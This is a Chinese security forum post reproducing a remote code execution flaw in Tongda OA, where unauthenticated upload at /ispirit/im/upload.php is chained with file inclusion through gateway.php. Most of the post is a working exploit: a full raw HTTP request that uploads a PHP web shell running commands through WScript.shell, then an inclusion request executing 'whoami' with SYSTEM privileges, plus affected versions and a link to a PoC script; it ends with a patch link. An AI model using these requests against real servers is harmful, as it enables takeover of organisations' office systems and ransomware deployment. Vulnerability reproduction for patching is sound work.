安全矩阵

 找回密码
 立即注册
搜索
查看: 4600|回复: 0

通达OA 任意文件上传+文件包含导致RCE漏洞复现

[复制链接]

991

主题

1063

帖子

4315

积分

论坛元老

Rank: 8Rank: 8

积分
4315
发表于 2020-3-31 20:46:17 | 显示全部楼层 |阅读模式
原文链接:通达OA 任意文件上传+文件包含导致RCE漏洞复现

0X00简介
通达OA(Office Anywhere网络智能办公系统)是由北京通达信科科技有限公司自主研发的协同办公自动化系统,包括流程审批、行政办公、日常事务、数据统计分析、即时通讯、移动办公等。
该漏洞被黑产利用,用于投放勒索病毒。在绕过身份验证的情况下通过文件上传漏洞上传恶意php文件,组合文件包含漏洞最终造成远程代码执行漏洞,从而导致可以控制服务器system权限。

0X01漏洞概述
此漏洞是由未授权上传和本地文件包含两个漏洞组合而形成的rce漏洞
文件上传地址:http://localhost:801/ispirit/im/upload.php
本地文件包含地址:http://localhost:801/ispirit/interface/gateway.php
这个地址我看有的复现地址不一样,是/mac/gateway.php,可能和操作系统有关,需要注意下。


0X02漏洞影响版本
通达OA V11版
通达OA 2017版
通达OA 2016版
通达OA 2015版
通达OA 2013增强版
通达OA 2013版


0X03环境搭建
下载地址:
http://www.tongda2000.com/download/down.php?VERSION=2019&code=86d3V9EzrapwAKhPkxfbNZDsfB48gbFvbS0QYsUr%2FnNWNP2e5Fn%2F&F=baidu_natural&K=
安装:将下载的exe下载安装即可。(可以自定义端口,默认为80端口。)
安装完成界面:


0X04漏洞复现
直接上传:
访问任意文件上传漏洞路径/ispirit/im/upload.php



Suite抓包发送小马数据包可以看到成功上传
  1. POST /ispirit/im/upload.php HTTP/1.1

  2. Host: 127.0.0.1:801

  3. Content-Length: 658

  4. Cache-Control: no-cache

  5. User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36

  6. Content-Type: multipart/form-data; boundary=----WebKitFormBoundarypyfBh1YB4pV8McGB

  7. Accept: */*

  8. Accept-Encoding: gzip, deflate

  9. Accept-Language: zh-CN,zh;q=0.9,zh-HK;q=0.8,ja;q=0.7,en;q=0.6,zh-TW;q=0.5

  10. Cookie: PHPSESSID=123

  11. Connection: close

  12. 

  13. ------WebKitFormBoundarypyfBh1YB4pV8McGB

  14. Content-Disposition: form-data; name="UPLOAD_MODE"

  15. 

  16. 2

  17. ------WebKitFormBoundarypyfBh1YB4pV8McGB

  18. Content-Disposition: form-data; name="P"

  19. 

  20. 123

  21. ------WebKitFormBoundarypyfBh1YB4pV8McGB

  22. Content-Disposition: form-data; name="DEST_UID"

  23. 

  24. 1

  25. ------WebKitFormBoundarypyfBh1YB4pV8McGB

  26. Content-Disposition: form-data; name="ATTACHMENT"; filename="jpg"

  27. Content-Type: image/jpeg

  28. 

  29. <?php

  30. $command=$_POST['cmd'];

  31. $wsh = new COM('WScript.shell');

  32. $exec = $wsh->exec("cmd /c ".$command);

  33. $stdout = $exec->StdOut();

  34. $stroutput = $stdout->ReadAll();

  35. echo $stroutput;

  36. ?>

  37. ------WebKitFormBoundarypyfBh1YB4pV8McGB--
复制代码


使用Burp Suite抓包发送,构造文件包含数据包并执行命令。
  1. json={"url":"/general/../../attach/im/2003/815199247.jpg"}&cmd=whoami
复制代码


命令执行成功,并且权限是system权限
也可使用poc脚本
https://github.com/fuhei/tongda_rce下载py脚本验证,使用方法如下:


注:有些版本gateway.php路径不同
如2013:
/ ispirit/ im/ upload. php
/ ispirit/ interface/ gateway . php
2017:
/ispirit/ im/ upload. php / mac/ gateway. Php
本文使用的v11版本路径为
/ispirit/im/upload.php
/ispirit/interface/gateway.php


0X05修复建议
更新官方补丁
http://www.tongda2000.com/news/673.php


回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

小黑屋|安全矩阵

GMT+8, 2024-3-29 09:44 , Processed in 0.014021 second(s), 18 queries .

Powered by Discuz! X4.0

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表